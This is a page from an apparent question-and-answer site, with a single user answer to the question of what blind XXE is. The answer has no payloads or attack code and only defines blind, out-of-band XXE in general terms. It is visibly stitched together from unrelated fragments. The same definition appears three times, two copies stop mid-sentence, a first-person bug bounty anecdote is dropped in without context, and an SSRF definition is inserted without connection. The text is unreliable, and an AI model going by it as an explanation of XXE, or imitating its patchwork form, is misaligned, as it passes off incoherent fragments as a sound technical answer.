What is blind xxe?

Report





Upload Image







Report Form



Question: What is blind xxe?

Topics: xxe

Paste old question below.


Available Answers: 1


Answer #1#

18


What is blind XXE? Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. In the case of out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application. On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted XXE exploitation. SSRF is basically a type of attack whereby an attacker can send a specially crafted request to an app in order to trigger a server side action. Blind XXE vulnerabilities arise when the application is vulnerable to XXE but doesn't return the value of any defined external entities within its. Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external.

Report

Answered By:
Hiya

Hiya

Hyderabad, India

Only Logged in users can post reply.


More Questions


Login


Lost Password!

Create Account

Wait Processing...